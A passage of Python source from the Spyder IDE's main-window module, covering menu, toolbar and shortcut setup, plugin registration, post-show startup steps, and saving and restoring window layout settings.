    the status bar, registers every built-in plugin (console, editor,
    explorers, IPython console, projects, ...) and any third-party
    plugins, then fills all menus/toolbars and applies shortcuts.
    """
    self.debug_print("*** Start of MainWindow setup ***")
    self.debug_print(" ..core actions")
    self.close_dockwidget_action = create_action(
        self,
        icon=ima.icon('DialogCloseButton'),
        text=_("Close current pane"),
        triggered=self.close_current_dockwidget,
        context=Qt.ApplicationShortcut)
    self.register_shortcut(self.close_dockwidget_action, "_",
                           "Close pane")
    self.lock_dockwidgets_action = create_action(
        self, _("Lock panes"),
        toggled=self.toggle_lock_dockwidgets,
        context=Qt.ApplicationShortcut)
    self.register_shortcut(self.lock_dockwidgets_action, "_",
                           "Lock unlock panes")
    # custom layouts shortcuts
    self.toggle_next_layout_action = create_action(
        self,
        _("Use next layout"),
        triggered=self.toggle_next_layout,
        context=Qt.ApplicationShortcut)
    self.toggle_previous_layout_action = create_action(
        self,
        _("Use previous layout"),
        triggered=self.toggle_previous_layout,
        context=Qt.ApplicationShortcut)
    self.register_shortcut(self.toggle_next_layout_action, "_",
                           "Use next layout")
    self.register_shortcut(self.toggle_previous_layout_action, "_",
                           "Use previous layout")
    # File switcher shortcuts
    self.file_switcher_action = create_action(
        self,
        _('File switcher...'),
        icon=ima.icon('filelist'),
        tip=_('Fast switch between files'),
        triggered=self.open_fileswitcher,
        context=Qt.ApplicationShortcut)
    self.register_shortcut(self.file_switcher_action, context="_",
                           name="File switcher")
    self.symbol_finder_action = create_action(
        self, _('Symbol finder...'),
        icon=ima.icon('symbol_find'),
        tip=_('Fast symbol search in file'),
        triggered=self.open_symbolfinder,
        context=Qt.ApplicationShortcut)
    self.register_shortcut(self.symbol_finder_action, context="_",
                           name="symbol finder", add_sc_to_tip=True)
    self.file_toolbar_actions = [self.file_switcher_action,
                                 self.symbol_finder_action]

    def create_edit_action(text, tr_text, icon):
        # Helper: build an edit action whose shortcut name is derived
        # from *text* (e.g. "Select All" -> method name "selectAll").
        textseq = text.split(' ')
        method_name = textseq[0].lower()+"".join(textseq[1:])
        action = create_action(self, tr_text,
                               icon=icon,
                               triggered=self.global_callback,
                               data=method_name,
                               context=Qt.WidgetShortcut)
        self.register_shortcut(action, "Editor", text)
        return action

    self.undo_action = create_edit_action('Undo', _('Undo'),
                                          ima.icon('undo'))
    self.redo_action = create_edit_action('Redo', _('Redo'),
                                          ima.icon('redo'))
    self.copy_action = create_edit_action('Copy', _('Copy'),
                                          ima.icon('editcopy'))
    self.cut_action = create_edit_action('Cut', _('Cut'),
                                         ima.icon('editcut'))
    self.paste_action = create_edit_action('Paste', _('Paste'),
                                           ima.icon('editpaste'))
    self.selectall_action = create_edit_action("Select All",
                                               _("Select All"),
                                               ima.icon('selectall'))
    self.edit_menu_actions = [self.undo_action, self.redo_action,
                              None, self.cut_action, self.copy_action,
                              self.paste_action, self.selectall_action]
    namespace = None
    self.debug_print(" ..toolbars")
    # File menu/toolbar
    self.file_menu = self.menuBar().addMenu(_("&File"))
    self.file_toolbar = self.create_toolbar(_("File toolbar"),
                                            "file_toolbar")
    # Edit menu/toolbar
    self.edit_menu = self.menuBar().addMenu(_("&Edit"))
    self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
                                            "edit_toolbar")
    # Search menu/toolbar
    self.search_menu = self.menuBar().addMenu(_("&Search"))
    self.search_toolbar = self.create_toolbar(_("Search toolbar"),
                                              "search_toolbar")
    # Source menu/toolbar
    self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
    self.source_toolbar = self.create_toolbar(_("Source toolbar"),
                                              "source_toolbar")
    # Run menu/toolbar
    self.run_menu = self.menuBar().addMenu(_("&Run"))
    self.run_toolbar = self.create_toolbar(_("Run toolbar"),
                                           "run_toolbar")
    # Debug menu/toolbar
    self.debug_menu = self.menuBar().addMenu(_("&Debug"))
    self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
                                             "debug_toolbar")
    # Consoles menu/toolbar
    self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
    # Projects menu
    self.projects_menu = self.menuBar().addMenu(_("&Projects"))
    self.projects_menu.aboutToShow.connect(self.valid_project)
    # Tools menu
    self.tools_menu = self.menuBar().addMenu(_("&Tools"))
    # View menu
    self.view_menu = self.menuBar().addMenu(_("&View"))
    # Help menu
    self.help_menu = self.menuBar().addMenu(_("&Help"))
    # Status bar
    status = self.statusBar()
    status.setObjectName("StatusBar")
    status.showMessage(_("Welcome to Spyder!"), 5000)
    self.debug_print(" ..tools")
    # Tools + External Tools
    prefs_action = create_action(self, _("Pre&ferences"),
                                 icon=ima.icon('configure'),
                                 triggered=self.edit_preferences,
                                 context=Qt.ApplicationShortcut)
    self.register_shortcut(prefs_action, "_", "Preferences",
                           add_sc_to_tip=True)
    spyder_path_action = create_action(
        self,
        _("PYTHONPATH manager"),
        None, icon=ima.icon('pythonpath'),
        triggered=self.path_manager_callback,
        tip=_("Python Path Manager"),
        menurole=QAction.ApplicationSpecificRole)
    update_modules_action = create_action(
        self,
        _("Update module names list"),
        triggered=lambda: module_completion.reset(),
        tip=_("Refresh list of module names "
              "available in PYTHONPATH"))
    reset_spyder_action = create_action(
        self, _("Reset Spyder to factory defaults"),
        triggered=self.reset_spyder)
    self.tools_menu_actions = [prefs_action, spyder_path_action]
    if WinUserEnvDialog is not None:
        winenv_action = create_action(
            self,
            _("Current user environment variables..."),
            icon='win_env.png',
            tip=_("Show and edit current user environment "
                  "variables in Windows registry "
                  "(i.e. for all sessions)"),
            triggered=self.win_env)
        self.tools_menu_actions.append(winenv_action)
    self.tools_menu_actions += [reset_spyder_action, MENU_SEPARATOR,
                                update_modules_action]
    # External Tools submenu
    self.external_tools_menu = QMenu(_("External Tools"))
    self.external_tools_menu_actions = []
    # WinPython control panel
    self.wp_action = create_action(
        self, _("WinPython control panel"),
        icon=get_icon('winpython.svg'),
        triggered=lambda: programs.run_python_script('winpython',
                                                     'controlpanel'))
    if os.name == 'nt' and is_module_installed('winpython'):
        self.external_tools_menu_actions.append(self.wp_action)
    # Qt-related tools
    additact = []
    for name in ("designer-qt4", "designer"):
        qtdact = create_program_action(self, _("Qt Designer"),
                                       name, 'qtdesigner.png')
        if qtdact:
            break
    for name in ("linguist-qt4", "linguist"):
        # BUG FIX: pass the loop variable *name* instead of the
        # hard-coded "linguist" literal, so "linguist-qt4" is actually
        # tried first (mirrors the designer loop above).
        qtlact = create_program_action(self, _("Qt Linguist"),
                                       name, 'qtlinguist.png')
        if qtlact:
            break
    args = ['-no-opengl'] if os.name == 'nt' else []
    for act in (qtdact, qtlact):
        if act:
            additact.append(act)
    if additact and is_module_installed('winpython'):
        self.external_tools_menu_actions += [None] + additact
    # Guidata and Sift
    self.debug_print(" ..sift?")
    gdgq_act = []
    # Guidata and Guiqwt don't support PyQt5 yet and they fail
    # with an AssertionError when imported using those bindings
    # (see issue 2274)
    try:
        from guidata import configtools
        from guidata import config  # analysis:ignore
        guidata_icon = configtools.get_icon('guidata.svg')
        guidata_act = create_python_script_action(
            self,
            _("guidata examples"), guidata_icon,
            "guidata",
            osp.join("tests", "__init__"))
        gdgq_act += [guidata_act]
    except:
        pass
    try:
        from guidata import configtools
        from guiqwt import config  # analysis:ignore
        guiqwt_icon = configtools.get_icon('guiqwt.svg')
        guiqwt_act = create_python_script_action(
            self,
            _("guiqwt examples"), guiqwt_icon, "guiqwt",
            osp.join("tests", "__init__"))
        if guiqwt_act:
            gdgq_act += [guiqwt_act]
        sift_icon = configtools.get_icon('sift.svg')
        sift_act = create_python_script_action(
            self, _("Sift"),
            sift_icon, "guiqwt", osp.join("tests", "sift"))
        if sift_act:
            gdgq_act += [sift_act]
    except:
        pass
    if gdgq_act:
        self.external_tools_menu_actions += [None] + gdgq_act
    # ViTables
    vitables_act = create_program_action(self, _("ViTables"),
                                         "vitables", 'vitables.png')
    if vitables_act:
        self.external_tools_menu_actions += [None, vitables_act]
    # Maximize current plugin
    self.maximize_action = create_action(
        self, '',
        triggered=self.maximize_dockwidget,
        context=Qt.ApplicationShortcut)
    self.register_shortcut(self.maximize_action, "_", "Maximize pane")
    self.__update_maximize_action()
    # Fullscreen mode
    self.fullscreen_action = create_action(
        self,
        _("Fullscreen mode"),
        triggered=self.toggle_fullscreen,
        context=Qt.ApplicationShortcut)
    self.register_shortcut(self.fullscreen_action, "_",
                           "Fullscreen mode", add_sc_to_tip=True)
    # Main toolbar
    self.main_toolbar_actions = [self.maximize_action,
                                 self.fullscreen_action,
                                 None,
                                 prefs_action, spyder_path_action]
    self.main_toolbar = self.create_toolbar(_("Main toolbar"),
                                            "main_toolbar")
    # Internal console plugin
    self.debug_print(" ..plugin: internal console")
    from spyder.plugins.console import Console
    self.console = Console(
        self, namespace, exitfunc=self.closing,
        profile=self.profile,
        multithreaded=self.multithreaded,
        message=_("Spyder Internal Console\n\n"
                  "This console is used to report application\n"
                  "internal errors and to inspect Spyder\n"
                  "internals with the following commands:\n"
                  " spy.app, spy.window, dir(spy)\n\n"
                  "Please don't use it to run your code\n\n"))
    self.console.register_plugin()
    # Working directory plugin
    self.debug_print(" ..plugin: working directory")
    from spyder.plugins.workingdirectory import WorkingDirectory
    self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
    self.workingdirectory.register_plugin()
    self.toolbarslist.append(self.workingdirectory.toolbar)
    # Help plugin
    if CONF.get('help', 'enable'):
        self.set_splash(_("Loading help..."))
        from spyder.plugins.help import Help
        self.help = Help(self)
        self.help.register_plugin()
    # Outline explorer widget
    if CONF.get('outline_explorer', 'enable'):
        self.set_splash(_("Loading outline explorer..."))
        from spyder.plugins.outlineexplorer import OutlineExplorer
        self.outlineexplorer = OutlineExplorer(self)
        self.outlineexplorer.register_plugin()
    # Editor plugin
    self.set_splash(_("Loading editor..."))
    from spyder.plugins.editor import Editor
    self.editor = Editor(self)
    self.editor.register_plugin()
    # Populating file menu entries
    quit_action = create_action(self, _("&Quit"),
                                icon=ima.icon('exit'),
                                tip=_("Quit"),
                                triggered=self.console.quit,
                                context=Qt.ApplicationShortcut)
    self.register_shortcut(quit_action, "_", "Quit")
    restart_action = create_action(self, _("&Restart"),
                                   icon=ima.icon('restart'),
                                   tip=_("Restart"),
                                   triggered=self.restart,
                                   context=Qt.ApplicationShortcut)
    self.register_shortcut(restart_action, "_", "Restart")
    self.file_menu_actions += [self.file_switcher_action,
                               self.symbol_finder_action, None,
                               restart_action, quit_action]
    self.set_splash("")
    self.debug_print(" ..widgets")
    # Namespace browser
    self.set_splash(_("Loading namespace browser..."))
    from spyder.plugins.variableexplorer import VariableExplorer
    self.variableexplorer = VariableExplorer(self)
    self.variableexplorer.register_plugin()
    # History log widget
    if CONF.get('historylog', 'enable'):
        self.set_splash(_("Loading history plugin..."))
        from spyder.plugins.history import HistoryLog
        self.historylog = HistoryLog(self)
        self.historylog.register_plugin()
    # IPython console
    self.set_splash(_("Loading IPython console..."))
    from spyder.plugins.ipythonconsole import IPythonConsole
    self.ipyconsole = IPythonConsole(self)
    self.ipyconsole.register_plugin()
    # Explorer
    if CONF.get('explorer', 'enable'):
        self.set_splash(_("Loading file explorer..."))
        from spyder.plugins.explorer import Explorer
        self.explorer = Explorer(self)
        self.explorer.register_plugin()
    # Online help widget
    try:  # Qt >= v4.4
        from spyder.plugins.onlinehelp import OnlineHelp
    except ImportError:  # Qt < v4.4
        OnlineHelp = None  # analysis:ignore
    if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
        self.set_splash(_("Loading online help..."))
        self.onlinehelp = OnlineHelp(self)
        self.onlinehelp.register_plugin()
    # Project explorer widget
    self.set_splash(_("Loading project explorer..."))
    from spyder.plugins.projects import Projects
    self.projects = Projects(self)
    self.projects.register_plugin()
    self.project_path = self.projects.get_pythonpath(at_start=True)
    # Find in files
    if CONF.get('find_in_files', 'enable'):
        from spyder.plugins.findinfiles import FindInFiles
        self.findinfiles = FindInFiles(self)
        self.findinfiles.register_plugin()
    # Third-party plugins
    self.set_splash(_("Loading third-party plugins..."))
    for mod in get_spyderplugins_mods():
        try:
            plugin = mod.PLUGIN_CLASS(self)
            if plugin.check_compatibility()[0]:
                self.thirdparty_plugins.append(plugin)
                plugin.register_plugin()
        except Exception as error:
            print("%s: %s" % (mod, str(error)), file=STDERR)
            traceback.print_exc(file=STDERR)
    self.set_splash(_("Setting up main window..."))
    # Help menu
    trouble_action = create_action(self,
                                   _("Troubleshooting..."),
                                   triggered=self.trouble_guide)
    dep_action = create_action(self, _("Dependencies..."),
                               triggered=self.show_dependencies,
                               icon=ima.icon('advanced'))
    report_action = create_action(self,
                                  _("Report issue..."),
                                  icon=ima.icon('bug'),
                                  triggered=self.report_issue)
    support_action = create_action(self,
                                   _("Spyder support..."),
                                   triggered=self.google_group)
    self.check_updates_action = create_action(self,
                                              _("Check for updates..."),
                                              triggered=self.check_updates)
    # Spyder documentation
    spyder_doc = 'https://docs.spyder-ide.org/'
    doc_action = create_action(self, _("Spyder documentation"),
                               icon=ima.icon('DialogHelpButton'),
                               triggered=lambda:
                               programs.start_file(spyder_doc))
    self.register_shortcut(doc_action, "_",
                           "spyder documentation")
    if self.help is not None:
        tut_action = create_action(self, _("Spyder tutorial"),
                                   triggered=self.help.show_tutorial)
    else:
        tut_action = None
    shortcuts_action = create_action(self, _("Shortcuts Summary"),
                                     shortcut="Meta+F1",
                                     triggered=self.show_shortcuts_dialog)
    # ----- Tours
    self.tour = tour.AnimatedTour(self)
    self.tours_menu = QMenu(_("Interactive tours"))
    self.tour_menu_actions = []
    # TODO: Only show intro tour for now. When we are close to finish
    # 3.0, we will finish and show the other tour
    self.tours_available = tour.get_tours(0)
    for i, tour_available in enumerate(self.tours_available):
        self.tours_available[i]['last'] = 0
        tour_name = tour_available['name']

        def trigger(i=i, self=self):  # closure needed!
            return lambda: self.show_tour(i)

        temp_action = create_action(self, tour_name, tip="",
                                    triggered=trigger())
        self.tour_menu_actions += [temp_action]
    self.tours_menu.addActions(self.tour_menu_actions)
    self.help_menu_actions = [doc_action, tut_action, shortcuts_action,
                              self.tours_menu,
                              MENU_SEPARATOR, trouble_action,
                              report_action, dep_action,
                              self.check_updates_action, support_action,
                              MENU_SEPARATOR]
    # Python documentation
    if get_python_doc_path() is not None:
        pydoc_act = create_action(self, _("Python documentation"),
                                  triggered=lambda:
                                  programs.start_file(get_python_doc_path()))
        self.help_menu_actions.append(pydoc_act)
    # IPython documentation
    if self.help is not None:
        ipython_menu = QMenu(_("IPython documentation"), self)
        intro_action = create_action(self, _("Intro to IPython"),
                                     triggered=self.ipyconsole.show_intro)
        quickref_action = create_action(self, _("Quick reference"),
                                        triggered=self.ipyconsole.show_quickref)
        guiref_action = create_action(self, _("Console help"),
                                      triggered=self.ipyconsole.show_guiref)
        add_actions(ipython_menu, (intro_action, guiref_action,
                                   quickref_action))
        self.help_menu_actions.append(ipython_menu)
    # Windows-only: documentation located in sys.prefix/Doc
    ipm_actions = []

    def add_ipm_action(text, path):
        """Add installed Python module doc action to help submenu"""
        # QAction.triggered works differently for PySide and PyQt
        path = file_uri(path)
        if not API == 'pyside':
            slot = lambda _checked, path=path: programs.start_file(path)
        else:
            slot = lambda path=path: programs.start_file(path)
        action = create_action(self, text,
                               icon='%s.png' % osp.splitext(path)[1][1:],
                               triggered=slot)
        ipm_actions.append(action)

    sysdocpth = osp.join(sys.prefix, 'Doc')
    if osp.isdir(sysdocpth):  # exists on Windows, except frozen dist.
        for docfn in os.listdir(sysdocpth):
            pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
            match = re.match(pt, docfn)
            if match is not None:
                pname = match.groups()[0]
                if pname not in ('Python', ):
                    add_ipm_action(pname, osp.join(sysdocpth, docfn))
    # Installed Python modules submenu (Windows only)
    if ipm_actions:
        pymods_menu = QMenu(_("Installed Python modules"), self)
        add_actions(pymods_menu, ipm_actions)
        self.help_menu_actions.append(pymods_menu)
    # Online documentation
    web_resources = QMenu(_("Online documentation"))
    webres_actions = create_module_bookmark_actions(self,
                                                    self.BOOKMARKS)
    webres_actions.insert(2, None)
    webres_actions.insert(5, None)
    webres_actions.insert(8, None)
    add_actions(web_resources, webres_actions)
    self.help_menu_actions.append(web_resources)
    # Qt assistant link
    if sys.platform.startswith('linux') and not PYQT5:
        qta_exe = "assistant-qt4"
    else:
        qta_exe = "assistant"
    qta_act = create_program_action(self, _("Qt documentation"),
                                    qta_exe)
    if qta_act:
        self.help_menu_actions += [qta_act, None]
    # About Spyder
    about_action = create_action(self,
                                 _("About %s...") % "Spyder",
                                 icon=ima.icon('MessageBoxInformation'),
                                 triggered=self.about)
    self.help_menu_actions += [MENU_SEPARATOR, about_action]
    # Status bar widgets
    from spyder.widgets.status import MemoryStatus, CPUStatus
    self.mem_status = MemoryStatus(self, status)
    self.cpu_status = CPUStatus(self, status)
    self.apply_statusbar_settings()
    # ----- View
    # View menu
    self.plugins_menu = QMenu(_("Panes"), self)
    self.toolbars_menu = QMenu(_("Toolbars"), self)
    self.quick_layout_menu = QMenu(_("Window layouts"), self)
    self.quick_layout_set_menu()
    self.view_menu.addMenu(self.plugins_menu)  # Panes
    add_actions(self.view_menu, (self.lock_dockwidgets_action,
                                 self.close_dockwidget_action,
                                 self.maximize_action,
                                 MENU_SEPARATOR))
    self.show_toolbars_action = create_action(self,
                                              _("Show toolbars"),
                                              triggered=self.show_toolbars,
                                              context=Qt.ApplicationShortcut)
    self.register_shortcut(self.show_toolbars_action, "_",
                           "Show toolbars")
    self.view_menu.addMenu(self.toolbars_menu)
    self.view_menu.addAction(self.show_toolbars_action)
    add_actions(self.view_menu, (MENU_SEPARATOR,
                                 self.quick_layout_menu,
                                 self.toggle_previous_layout_action,
                                 self.toggle_next_layout_action,
                                 MENU_SEPARATOR,
                                 self.fullscreen_action))
    if set_attached_console_visible is not None:
        cmd_act = create_action(self,
                                _("Attached console window (debugging)"),
                                toggled=set_attached_console_visible)
        cmd_act.setChecked(is_attached_console_visible())
        add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
    # Adding external tools action to "Tools" menu
    if self.external_tools_menu_actions:
        external_tools_act = create_action(self, _("External Tools"))
        external_tools_act.setMenu(self.external_tools_menu)
        self.tools_menu_actions += [None, external_tools_act]
    # Filling out menu/toolbar entries:
    add_actions(self.file_menu, self.file_menu_actions)
    add_actions(self.edit_menu, self.edit_menu_actions)
    add_actions(self.search_menu, self.search_menu_actions)
    add_actions(self.source_menu, self.source_menu_actions)
    add_actions(self.run_menu, self.run_menu_actions)
    add_actions(self.debug_menu, self.debug_menu_actions)
    add_actions(self.consoles_menu, self.consoles_menu_actions)
    add_actions(self.projects_menu, self.projects_menu_actions)
    add_actions(self.tools_menu, self.tools_menu_actions)
    add_actions(self.external_tools_menu,
                self.external_tools_menu_actions)
    add_actions(self.help_menu, self.help_menu_actions)
    add_actions(self.main_toolbar, self.main_toolbar_actions)
    add_actions(self.file_toolbar, self.file_toolbar_actions)
    add_actions(self.edit_toolbar, self.edit_toolbar_actions)
    add_actions(self.search_toolbar, self.search_toolbar_actions)
    add_actions(self.source_toolbar, self.source_toolbar_actions)
    add_actions(self.debug_toolbar, self.debug_toolbar_actions)
    add_actions(self.run_toolbar, self.run_toolbar_actions)
    # Apply all defined shortcuts (plugins + 3rd-party plugins)
    self.apply_shortcuts()
    # Emitting the signal notifying plugins that main window menu and
    # toolbar actions are all defined:
    self.all_actions_defined.emit()
    # Window set-up
    self.debug_print("Setting up window...")
    self.setup_layout(default=False)
    # Show and hide shortcuts in menus for Mac.
    # This is a workaround because we can't disable shortcuts
    # by setting context=Qt.WidgetShortcut there
    if sys.platform == 'darwin':
        for name in ['file', 'edit', 'search', 'source', 'run', 'debug',
                     'projects', 'tools', 'plugins']:
            menu_object = getattr(self, name + '_menu')
            menu_object.aboutToShow.connect(
                lambda name=name: self.show_shortcuts(name))
            menu_object.aboutToHide.connect(
                lambda name=name: self.hide_shortcuts(name))
    if self.splash is not None:
        self.splash.hide()
    # Enabling tear off for all menus except help menu
    if CONF.get('main', 'tear_off_menus'):
        for child in self.menuBar().children():
            if isinstance(child, QMenu) and child != self.help_menu:
                child.setTearOffEnabled(True)
    # Menu about to show
    for child in self.menuBar().children():
        if isinstance(child, QMenu):
            try:
                child.aboutToShow.connect(self.update_edit_menu)
            except TypeError:
                pass
    self.debug_print("*** End of MainWindow setup ***")
    self.is_starting_up = False
def post_visible_setup(self):
    """Actions to be performed only after the main window's `show` method
    was triggered: final widget state fixes, single-instance server
    startup, menu/toolbar submenu creation and startup checks.
    """
    self.restore_scrollbar_position.emit()
    # Remove our temporary dir
    atexit.register(self.remove_tmpdir)
    # [Workaround for Issue 880]
    # QDockWidget objects are not painted if restored as floating
    # windows, so we must dock them before showing the mainwindow,
    # then set them again as floating windows here.
    for widget in self.floating_dockwidgets:
        widget.setFloating(True)
    # In MacOS X 10.7 our app is not displayed after initialized (I don't
    # know why because this doesn't happen when started from the terminal),
    # so we need to resort to this hack to make it appear.
    if running_in_mac_app():
        idx = __file__.index(MAC_APP_NAME)
        app_path = __file__[:idx]
        subprocess.call(['open', app_path + MAC_APP_NAME])
    # Server to maintain just one Spyder instance and open files in it if
    # the user tries to start other instances with
    # $ spyder foo.py
    if (CONF.get('main', 'single_instance') and not self.new_instance
            and self.open_files_server):
        t = threading.Thread(target=self.start_open_files_server)
        # Thread.setDaemon() is a deprecated alias; assign the
        # attribute directly so the thread dies with the app.
        t.daemon = True
        t.start()
        # Connect the window to the signal emitted by the previous server
        # when it gets a client connected to it
        self.sig_open_external_file.connect(self.open_external_file)
    # Create Plugins and toolbars submenus
    self.create_plugins_menu()
    self.create_toolbars_menu()
    # Update toolbar visibility status
    self.toolbars_visible = CONF.get('main', 'toolbars_visible')
    self.load_last_visible_toolbars()
    # Update lock status of dockwidgets (panes)
    self.lock_dockwidgets_action.setChecked(self.dockwidgets_locked)
    self.apply_panes_settings()
    # Hide Internal Console so that people don't use it instead of
    # the External or IPython ones
    if self.console.dockwidget.isVisible() and DEV is None:
        self.console.toggle_view_action.setChecked(False)
        self.console.dockwidget.hide()
    # Show Help and Consoles by default
    plugins_to_show = [self.ipyconsole]
    if self.help is not None:
        plugins_to_show.append(self.help)
    for plugin in plugins_to_show:
        if plugin.dockwidget.isVisible():
            plugin.dockwidget.raise_()
    # Show history file if no console is visible
    if not self.ipyconsole.isvisible:
        self.historylog.add_history(get_conf_path('history.py'))
    if self.open_project:
        self.projects.open_project(self.open_project)
    else:
        # Load last project if a project was active when Spyder
        # was closed
        self.projects.reopen_last_project()
        # If no project is active, load last session
        if self.projects.get_active_project() is None:
            self.editor.setup_open_files()
    # Check for spyder updates
    if DEV is None and CONF.get('main', 'check_updates_on_startup'):
        self.give_updates_feedback = False
        self.check_updates(startup=True)
    # Show dialog with missing dependencies
    self.report_missing_dependencies()
    # Raise the menuBar to the top of the main window widget's stack
    # (Fixes issue 3887)
    self.menuBar().raise_()
    self.is_setting_up = False
def set_window_title(self):
    """Compose the window title and apply it to the main window.

    The title includes the Python version, the Spyder version in dev
    mode, an optional debug marker, a custom suffix, and the active
    project path (with the home dir abbreviated to '~') when a
    project is open. The result is stored in ``self.base_title``.
    """
    py_major = sys.version_info[0]
    py_minor = sys.version_info[1]
    if DEV is not None:
        title = u"Spyder %s (Python %s.%s)" % (__version__,
                                               py_major, py_minor)
    else:
        title = u"Spyder (Python %s.%s)" % (py_major, py_minor)
    if DEBUG:
        title += u" [DEBUG MODE %d]" % DEBUG
    if self.window_title is not None:
        title += u' -- ' + to_text_string(self.window_title)
    if self.projects is not None:
        active_path = self.projects.get_active_project_path()
        if active_path:
            active_path = active_path.replace(get_home_dir(), u'~')
            title = u'{0} - {1}'.format(active_path, title)
    self.base_title = title
    self.setWindowTitle(self.base_title)
def report_missing_dependencies(self):
    """Show a QMessageBox with a list of missing hard dependencies."""
    missing_deps = dependencies.missing_dependencies()
    if not missing_deps:
        return
    text = _("<b>You have missing dependencies!</b>"
             "<br><br><tt>%s</tt><br><br>"
             "<b>Please install them to avoid this message.</b>"
             "<br><br>"
             "<i>Note</i>: Spyder could work without some of these "
             "dependencies, however to have a smooth experience when "
             "using Spyder we <i>strongly</i> recommend you to install "
             "all the listed missing dependencies.<br><br>"
             "Failing to install these dependencies might result in bugs. "
             "Please be sure that any found bugs are not the direct "
             "result of missing dependencies, prior to reporting a new "
             "issue."
             ) % missing_deps
    QMessageBox.critical(self, _('Error'), text, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
    """Load window layout settings from userconfig-based configuration
    with *prefix*, under *section*.

    default: if True, read the factory defaults and do not restore the
    inner layout (hexstate is returned as None).
    """
    get_func = CONF.get_default if default else CONF.get
    window_size = get_func(section, prefix+'size')
    prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
    hexstate = None if default else get_func(section, prefix+'state', None)
    pos = get_func(section, prefix+'position')
    # It's necessary to verify if the window/position value is valid
    # with the current screen. See issue 3748
    width, height = pos[0], pos[1]
    screen_shape = QApplication.desktop().geometry()
    if screen_shape.width() < width or screen_shape.height() < height:
        pos = CONF.get_default(section, prefix+'position')
    is_maximized = get_func(section, prefix+'is_maximized')
    is_fullscreen = get_func(section, prefix+'is_fullscreen')
    return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
            is_fullscreen)
def get_window_settings(self):
    """Return the current window settings as a tuple.

    Symmetric to the 'set_window_settings' setter: returns
    (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
    is_fullscreen).
    """
    window_size = (self.window_size.width(), self.window_size.height())
    is_fullscreen = self.isFullScreen()
    # In fullscreen the real maximized state is kept in maximized_flag
    is_maximized = (self.maximized_flag if is_fullscreen
                    else self.isMaximized())
    pos = (self.window_position.x(), self.window_position.y())
    prefs_dialog_size = (self.prefs_dialog_size.width(),
                         self.prefs_dialog_size.height())
    hexstate = qbytearray_to_str(self.saveState())
    return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
            is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
                        pos, is_maximized, is_fullscreen):
    """Set window settings.

    Symmetric to the 'get_window_settings' accessor: takes the same
    tuple of values (hexstate is the dock/toolbar state as a hex
    string or a falsy value, sizes/pos are (w, h)/(x, y) pairs).
    """
    # Suspend repaints while geometry and dock state are rebuilt.
    self.setUpdatesEnabled(False)
    self.window_size = QSize(window_size[0], window_size[1]) # width,height
    self.prefs_dialog_size = QSize(prefs_dialog_size[0],
                                   prefs_dialog_size[1]) # width,height
    self.window_position = QPoint(pos[0], pos[1]) # x,y
    # Clear any maximized/fullscreen state before resizing/moving so
    # the saved geometry is applied to a "normal" window.
    self.setWindowState(Qt.WindowNoState)
    self.resize(self.window_size)
    self.move(self.window_position)
    # Window layout
    if hexstate:
        self.restoreState( QByteArray().fromHex(
                str(hexstate).encode('utf-8')) )
        # [Workaround for Issue 880]
        # QDockWidget objects are not painted if restored as floating
        # windows, so we must dock them before showing the mainwindow.
        for widget in self.children():
            if isinstance(widget, QDockWidget) and widget.isFloating():
                self.floating_dockwidgets.append(widget)
                widget.setFloating(False)
    # Is fullscreen?
    if is_fullscreen:
        self.setWindowState(Qt.WindowFullScreen)
    self.__update_fullscreen_action()
    # Is maximized?
    if is_fullscreen:
        # Remember the maximized state for when fullscreen is left.
        self.maximized_flag = is_maximized
    elif is_maximized:
        self.setWindowState(Qt.WindowMaximized)
    # Re-enable repaints now that the final state is in place.
    self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
                                 none_state=False):
    """Persist the current window settings with *prefix* in
    the userconfig-based configuration, under *section*.

    none_state: if True, store None instead of the dock/toolbar state.
    """
    size = self.window_size
    CONF.set(section, prefix+'size', (size.width(), size.height()))
    dialog_size = self.prefs_dialog_size
    CONF.set(section, prefix+'prefs_dialog_size',
             (dialog_size.width(), dialog_size.height()))
    CONF.set(section, prefix+'is_maximized', self.isMaximized())
    CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
    position = self.window_position
    CONF.set(section, prefix+'position', (position.x(), position.y()))
    # Restore the non-maximized pane layout before saving dock state
    self.maximize_dockwidget(restore=True)
    if none_state:
        window_state = None
    else:
        window_state = qbytearray_to_str(self.saveState())
    CONF.set(section, prefix + 'state', window_state)
    CONF.set(section, prefix+'statusbar',
             not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
    """Tabify the dockwidgets of two plugins."""
    first_dock = first.dockwidget
    second_dock = second.dockwidget
    self.tabifyDockWidget(first_dock, second_dock)
# --- Layouts
def setup_layout(self, default=False):
    """Setup window layout.

    Loads the saved window settings and applies them. On the very
    first run (no saved dock state), bootstraps the default layout
    and seeds the 'quick_layouts' config section. If *default* is
    True, factory defaults are loaded instead of user settings.
    """
    prefix = 'window' + '/'
    settings = self.load_window_settings(prefix, default)
    hexstate = settings[0]
    self.first_spyder_run = False
    # A missing dock state means this is the first execution (or a
    # reset): build and persist the default layouts.
    if hexstate is None:
        # First Spyder execution:
        self.setWindowState(Qt.WindowMaximized)
        self.first_spyder_run = True
        self.setup_default_layouts('default', settings)
        # Now that the initial setup is done, copy the window settings,
        # except for the hexstate in the quick layouts sections for the
        # default layouts.
        # Order and name of the default layouts is found in config.py
        section = 'quick_layouts'
        get_func = CONF.get_default if default else CONF.get
        order = get_func(section, 'order')
        # restore the original defaults if reset layouts is called
        if default:
            CONF.set(section, 'active', order)
            CONF.set(section, 'order', order)
            CONF.set(section, 'names', order)
        # Save one settings slot per default layout (state left None).
        for index, name, in enumerate(order):
            prefix = 'layout_{0}/'.format(index)
            self.save_current_window_settings(prefix, section,
                                              none_state=True)
        # store the initial layout as the default in spyder
        prefix = 'layout_default/'
        section = 'quick_layouts'
        self.save_current_window_settings(prefix, section, none_state=True)
